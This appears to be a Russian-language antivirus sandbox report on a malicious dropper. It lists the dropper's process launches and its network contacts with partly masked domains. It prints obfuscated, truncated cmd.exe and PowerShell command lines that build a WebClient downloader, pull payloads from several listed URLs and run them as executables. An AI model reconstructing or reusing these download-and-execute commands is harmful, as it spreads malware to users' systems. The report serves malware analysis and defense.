Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set 2QC=;'EvE'=rJE$}}{hctac}};kaerb;'rmN'=rwG$;cfk$ metI-ekovnI{ )00008 eg- htgnel.)cfk$ metI-teG(( fI;'Raz'=IUJ$;)cfk$ ,wtu$(eliFdaolnwoD.tUN${yrt...
Сетевая активность
Подключается к
- 'br####careinc.com':443
- 'be####tolenders.com':80
TCP
Запросы HTTP GET
- http://be####tolenders.com/br2gd8R
Другие
- 'br####careinc.com':443
UDP
- DNS ASK br####careinc.com
- DNS ASK ak###rum.com
- DNS ASK be####tolenders.com
- DNS ASK mi#####hoperwanda.org
- DNS ASK af####skincare.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set 2QC=;'EvE'=rJE$}}{hctac}};kaerb;'rmN'=rwG$;cfk$ metI-ekovnI{ )00008 eg- htgnel.)cfk$ metI-teG(( fI;'Raz'=IUJ$;)cfk$ ,wtu$(eliFdaolnwoD.tUN${yrt...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set 2QC=;'EvE'=rJE$}}{hctac}};kaerb;'rmN'=rwG$;cfk$ metI-ekovnI{ )00008 eg- htgnel.)cfk$ metI-teG(( fI;'Raz'=IUJ$;)cfk$ ,wtu$(eliFdaolnwoD.tUN${yrt{)CuI$ ni wtu$(hcaerof;'exe.'+BpE$+'\'+p...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=CM. tokens=3" %8 IN ('assoc.psc1') DO %8 -"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $NWO='GRQ';$NUt=new-object Net.WebClient;$IuC='https://bridgecareinc.com/xLmMFIoUl@http://ak###rum.com/ILqikoQ1n@http://bestautolenders.com/br2gd8R@http://www.missionhoperwanda.o...
- '<SYSTEM32>\cmd.exe' /c assoc.psc1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
